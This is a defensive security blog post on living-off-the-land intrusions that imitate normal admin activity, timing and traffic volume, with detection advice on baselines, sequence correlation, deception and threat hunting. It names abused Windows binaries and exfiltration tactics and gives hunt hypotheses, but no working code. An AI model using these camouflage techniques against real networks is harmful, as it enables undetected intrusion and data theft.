The Attack That Looked Exactly Like Work
Nobody flagged the PowerShell script.
It ran every morning at 7:52am — same time the IT team ran their routine maintenance scripts. It queried Active Directory for group memberships — the same query the helpdesk ran daily for access requests. It made outbound HTTPS connections to a cloud storage endpoint — the same pattern as the company’s approved backup tools.
For 58 days, it ran without interruption. Your SIEM saw it. Your EDR logged it. Your analysts scrolled past it in the morning triage queue — not because they were negligent, but because it looked exactly like everything else. Same tools. Same timing. Same traffic patterns. Same everything.
Except it was exfiltrating 4GB of customer data every 72 hours to an attacker-controlled S3 bucket.
The script wasn’t sophisticated. The attacker wasn’t particularly skilled. What they were was patient and observant — they had spent two weeks studying the environment’s normal behavior patterns before executing anything. They knew when maintenance scripts ran. They knew which cloud endpoints were whitelisted. They knew what volume of outbound traffic was normal enough to avoid anomaly detection.
They didn’t evade your security tools.
They dressed the attack in the clothes your security tools were trained to trust.
The Camouflage Principle
Every detection system is built around a fundamental assumption: that malicious activity looks different from legitimate activity.
Signatures detect known-bad code. Behavioral rules fire on anomalous patterns. Anomaly detection flags deviations from established baselines. The entire architecture of modern security tooling rests on the ability to distinguish the malicious from the normal.
Attackers who understand this architecture don’t try to defeat it. They sidestep it entirely — by making malicious activity indistinguishable from normal activity. Not by being more sophisticated. By being more observant.
This is the camouflage principle, and it is now the dominant operational approach in enterprise intrusions:
- Use the tools that already exist on the target system
- Operate during hours when legitimate activity is highest
- Move at the speed of normal administrative operations
- Generate the same traffic volumes as legitimate business processes
- Authenticate with real credentials to real systems
When you do all of these things, you don’t appear in the alert queue. You appear in the log file — alongside ten thousand other entries that look exactly like you — and nobody has the time or the detection logic to tell you apart.
The Mandiant M-Trends 2024 report found that Living Off the Land techniques appeared in over 70% of significant enterprise intrusions — making it the dominant attack methodology, not an edge case.
Your perimeter blocked the unfamiliar. The familiar walked right in.
The Attacker’s Observational Playbook
Before executing anything, sophisticated attackers study. The reconnaissance phase of a modern enterprise intrusion isn’t just network scanning — it’s behavioral analysis of the target environment. Understanding what normal looks like, so that malicious activity can be dressed to match.
Here’s exactly what they’re observing — and how that observation becomes operational camouflage.
“What Tools Are Already Here?”
The first question isn’t “what exploit can I use?” It’s “what legitimate tools are on this system that I can repurpose?”
Every Windows endpoint comes preinstalled with a toolkit that, in the hands of an attacker with valid credentials, enables almost every phase of an intrusion without touching a single external tool:
PowerShell — remote command execution, credential extraction, network enumeration, data staging, and exfiltration. Native to every Windows system. Deeply trusted by security tooling. Generates logs that look identical to legitimate administrative use.
WMI (Windows Management Instrumentation) — remote system queries, lateral movement, persistence via WMI subscriptions, process execution on remote hosts. Runs as a system process. Generates minimal default logging. Trusted by every security product that doesn’t have WMI-specific behavioral rules.
certutil.exe — designed for certificate management. Used by attackers to download payloads, decode Base64-encoded files, and cache arbitrary content. A Microsoft-signed binary present on every Windows system. Rarely flagged.
mshta.exe, regsvr32.exe, rundll32.exe — legitimate Windows binaries routinely abused to execute malicious code while appearing to the process list as trusted system processes.
Cloud CLIs (aws cli, az cli, gcloud) — installed in most development environments. Used by attackers to enumerate cloud resources, exfiltrate data to attacker-controlled storage, and move laterally between cloud accounts. Every command looks like developer activity.
The attacker’s toolkit is your IT team’s toolkit. Trying to block it means blocking the tools your operations depend on. Not blocking it means the attacker operates invisibly.
“When Does Normal Activity Happen?”
Timing is camouflage.
A PowerShell script executing at 3am on a user workstation is anomalous. The same script executing at 8:15am alongside the ten other scripts your IT team runs during morning operations is invisible.
Attackers who have observed an environment’s operational rhythms time their activity to blend into the busiest windows:
- Morning operations — when IT scripts run, when employees log in, when backup jobs execute, when cloud deployments kick off
- Business hours — when high volumes of legitimate user activity mask individual anomalous events
- Change windows — when configuration changes are expected, when unusual system behavior is attributed to scheduled maintenance
- Patch cycles — when vulnerability scan traffic and system restarts create noise that obscures attacker activity
The Midnight Blizzard (formerly Cozy Bear) intrusion methodology — publicly documented by Microsoft — explicitly includes timing attacks to coincide with periods of normal administrative activity in the target environment. This isn’t tradecraft reserved for nation-state actors. It’s been adopted broadly across the attacker ecosystem precisely because it works against alert-threshold-based detection.
Your detection thresholds were calibrated on average traffic patterns. Attackers who know your patterns can route around every threshold you’ve set.
“What Does Normal Traffic Volume Look Like?”
Volume-based anomaly detection fires when traffic patterns deviate from baselines. Attackers who know the baseline operate within it.
The scenario from the opening of this blog — 4GB of exfiltration every 72 hours — was designed around exactly this principle. The attacker had observed that the organization’s backup traffic averaged 3–5GB per day to approved cloud endpoints. By exfiltrating at the same volume, to an endpoint using the same HTTPS port, at similar times of day, they operated within the baseline’s normal range.
This is not a technically advanced technique. It requires only patience and observation. And it defeats volume-based and threshold-based anomaly detection entirely — because nothing crosses a threshold if you deliberately stay below it.
Data exfiltration that looks like backup traffic, lateral movement that looks like IT administration, reconnaissance that looks like helpdesk activity — these aren’t sophisticated evasion techniques. They’re patient imitation of what you’ve already told your detection systems to trust.
“What Credentials Are Available?”
The cleanest camouflage is valid authentication.
An attacker operating with a legitimate, authorized credential isn’t generating unauthorized access alerts — because the access is authorized. The account exists. The password is correct. The access policies permit the connection. Every security control that checks authentication sees a green light.
This is why credential compromise is the primary attack vector across virtually every major breach category. Not because attackers can’t find other ways in — but because valid credentials are the most effective camouflage available.
The specific credential categories most frequently exploited for their camouflage value:
Service accounts — typically have broad network access, often run without MFA, frequently have non-expiring passwords, and rarely have human behavioral baselines established because no human uses them interactively. An attacker operating as a service account is invisible to detection systems that baseline human user behavior.
Dormant privileged accounts — administrator accounts that haven’t been used in months, belonging to former employees, contractors, or deprovisioned systems. When activated by an attacker, they generate authentic-looking authentication events for accounts that show no prior anomalous activity.
Developer credentials — engineers with production access as a side effect of their development role. Broad permissions, active usage patterns, high tolerance for unusual API calls and infrastructure queries. An attacker wearing a developer credential can enumerate cloud infrastructure extensively without generating anomalous-looking behavior.
Every compromised credential is a disguise. The better the credential, the better the disguise.
Why Your Detection Stack Is Specifically Blind to This
The camouflage principle isn’t new. Security vendors know about Living Off the Land techniques. MITRE ATT&CK documents them exhaustively. Detection rules exist for many of them.
So why do they keep working?
Signature Rules Can’t Catch Intent
A PowerShell command that enumerates Active Directory group memberships is a PowerShell command that enumerates Active Directory group memberships — whether run by your helpdesk or by an attacker with a stolen credential.
Signature-based detection fires on known-bad indicators: specific tool names, specific command strings, specific file hashes. It cannot fire on the question “is this legitimate administrative activity or attacker reconnaissance?” because the log entry for both is identical. Intent doesn’t appear in the log file.
To catch behavior-based camouflage, you need behavior-based detection — rules that fire not on what a command does, but on whether the context in which it runs deviates from established normal behavior for that account, on that system, at that time.
Behavioral Baselines Are Expensive and Rare
Behavior-based detection requires behavioral baselines — a defined picture of what normal looks like for every user, every service account, every system, every data flow — that anomalies are measured against.
Building those baselines takes time: typically 30–90 days of observation before anomaly detection becomes meaningful. It requires data from every relevant source — endpoint, network, identity, cloud — to build a complete picture rather than a fragmented one. And it requires continuous maintenance as environments change and baselines drift.
Most organizations have not made this investment. Their detection systems fire on signatures and static thresholds — neither of which catches an attacker who has studied the environment carefully enough to operate within both.
The UEBA market — User and Entity Behavior Analytics — exists precisely to address this gap. Platforms like Microsoft Sentinel UEBA, Splunk UEBA, and Exabeam build and maintain behavioral baselines automatically, scoring deviations in real time. But UEBA deployment without baseline calibration is noise, and most deployments are under-calibrated because the investment in tuning hasn’t been made.
The detection capability that catches camouflage attacks exists. Most organizations just haven’t built it yet.
Alert Volume Buries the Needle
Even when behavioral anomalies are detected, they’re often buried.
A service account making an unusual LDAP query generates a low-confidence behavioral alert. In a queue of 1,200 daily alerts — 94% of which are false positives — a low-confidence finding from an unfamiliar detection rule gets deprioritized. The analyst closes it as inconclusive and moves to the next ticket.
The attacker didn’t defeat the detection rule. They benefited from the operational reality that low-confidence alerts are processed quickly and rarely escalated.
Camouflage doesn’t need to be perfect. It just needs to generate enough uncertainty to slip through a triage process under time pressure.
What Actually Catches Camouflaged Attacks
Camouflage-based techniques are specifically designed to defeat the detection approaches most organizations rely on. Catching them requires detection approaches most organizations haven’t built.
Behavioral Baselines That Go Deep Enough to Matter
Surface-level behavioral detection — “this account logged in outside business hours” — is not sufficient to catch a sophisticated attacker who has studied your environment. They know your business hours. They operate inside them.
Effective behavioral baselines need to be specific enough to distinguish between:
- A PowerShell script run by IT at 8:15am as part of a documented maintenance procedure, and the same script run by a compromised service account at 8:17am for the first time in its operational history
- A developer querying cloud resource metadata as part of a deployment workflow, and the same query running from an account that has never previously made that API call
- File access in line with a user’s documented role and historical pattern, and the same access volume happening on systems the user has never previously accessed
This level of specificity requires account-level, system-level behavioral baselines — not environment-wide averages. Tools like Exabeam, Securonix, and Microsoft Sentinel UEBA build these per-entity models automatically from historical telemetry. They score every event not against a global threshold but against what is normal for that specific entity — making the “this looks like administrative activity” camouflage far less effective.
Sequence Detection Across the Kill Chain
Individual events, well-camouflaged, don’t reveal the attack. The sequence does.
A single LDAP query is normal. An LDAP query followed by a lateral SMB connection to a server that account has never accessed, followed by a credential dump attempt via Task Manager, followed by an outbound connection to a new cloud endpoint — that sequence is an attack chain regardless of how legitimate each individual step looks in isolation.
Kill chain correlation rules — built on MITRE ATT&CK sequences rather than individual technique detection — fire on the pattern rather than the event. They require that multiple events, across multiple data sources, occur in a meaningful sequence within a defined time window before generating an alert.
This is harder to build than single-event rules. It requires cross-source data correlation at a quality and completeness level that many SIEM deployments haven’t achieved. But it is the detection logic that catches camouflaged attacks — because the attacker who has disguised every individual step cannot disguise the sequence that those steps form.
Deception Technology
If the attacker is observing the environment to understand normal behavior, deception technology turns that observation against them.
Honeypots, honeytokens, and deception-based detection — platforms like Attivo Networks (now part of SentinelOne), Illusive Networks, and Canarytokens — plant fake assets, credentials, and data throughout the environment. These decoys look authentic to an attacker conducting reconnaissance. They appear in AD queries, show up in file shares, sit in credential stores.
Any interaction with a decoy asset is unambiguously malicious — no legitimate user or process should ever touch a decoy credential or connect to a honeypot. There are no false positives. There is no threshold to tune. The interaction itself is the detection event.
An attacker who studies your environment carefully enough to copy its normal behavior will inevitably encounter your decoys — because decoys are designed to be exactly what a reconnaissance sweep would find. The more thorough the attacker’s observation, the more likely they are to trigger a deception detection.
This inverts the camouflage principle entirely: the attacker’s strength — careful observation — becomes their exposure.
Threat Hunting Focused on LOL Techniques
Reactive detection waits for alerts. Threat hunting goes looking for what isn’t alerting.
For camouflage-based attacks specifically, effective hunts start from the LOL techniques most commonly used against your industry and go looking for their fingerprints in the telemetry — regardless of whether any rule fired.
High-value hunt hypotheses for camouflage detection:
Are there PowerShell executions with encoded command parameters running from user workstations outside the IT team’s documented scope? Legitimate IT scripts are typically documented and attributable. Encoded PowerShell from a finance workstation has no legitimate explanation.
Are there certutil.exe executions performing download or decode operations that don’t correspond to documented certificate management activities? Any certutil execution not tied to a known certificate operation warrants investigation.
Are service accounts making authentication attempts to systems outside their documented operational scope? Service accounts have defined functions. Authentication outside that scope — even with valid credentials — is anomalous regardless of whether it looks like administrative activity.
Are there outbound HTTPS connections to cloud storage endpoints that aren’t in your approved cloud service catalog? Exfiltration to an attacker-controlled S3 bucket looks identical to backup traffic — unless you’re comparing the destination to your approved endpoint list.
None of these hunts require new tools. They require someone asking the question and going to look for the answer — rather than waiting for a rule that may have been specifically designed around not firing on normal-looking activity.
The Operational Shift That Closes the Gap
Catching attackers who exploit normal behavior requires a fundamental shift in detection philosophy — from “is this known bad?” to “is this normal for this specific entity, at this specific time, in this specific context?”
That shift has three practical components:
1. Invest in per-entity behavioral baselines. Environment-wide thresholds don’t catch entity-level anomalies. An attacker operating a compromised service account within the environment’s normal parameters will never cross a global threshold. They will deviate significantly from that specific service account’s individual baseline — if one exists and is being monitored.
2. Build detection logic on sequences, not events. Single-event rules are the attackers’ preferred target because individual events can be made to look normal. Sequence-based rules fire on the pattern of an attack regardless of how innocuous each step appears individually.
3. Add deception layers that turn observation into exposure. If attackers study your environment to blend in, plant assets worth studying that report back when touched. The camouflage-based attacker’s most careful reconnaissance is the moment they’re most likely to trigger a deception detection.
None of these require replacing your existing stack. They require extending it — adding the behavioral depth, correlation logic, and deception coverage that makes the “I’ll just look normal” strategy progressively less viable.
The Bottom Line
The most dangerous attacker in your environment right now isn’t the one writing zero-day exploits. It’s the one who spent two weeks watching how your environment behaves — and is now operating inside it wearing the exact clothes your security tools were trained to trust.
Living Off the Land. Valid credentials. Business-hours timing. Normal traffic volumes.
The attack that looks like work is the attack that wins.
Catching it requires moving beyond the binary question of “is this known bad?” to the harder, richer question: “Is this normal for this specific account, this specific system, this specific time — and does this event, in sequence with the three before it, form a pattern that no legitimate operation would produce?”
That question requires behavioral baselines. It requires kill chain correlation. It requires proactive hunting. And it requires deception layers that punish the attacker’s greatest strength — their careful observation of your environment.
The attacker is already studying what normal looks like in your environment.
The question is whether your detection architecture is studying what normal looks like for them.
Your Next Move
Camouflage-based attacks succeed because they’re invisible to detection systems built for obvious threats — and visible only to detection systems built for behavioral anomalies and kill chain sequences.
→ Read next: No Alerts Doesn’t Mean No Threats — It Means You’re Blind — why a quiet dashboard is the most reliable sign that your detection architecture is being successfully exploited, not that your environment is clean.
→ Want to know whether a camouflaged attacker is operating in your environment right now? A behavioral threat hunt uses entity-level baseline analysis and kill chain correlation to go looking for the activity your alert rules aren’t catching — and either finds it or validates that it isn’t there.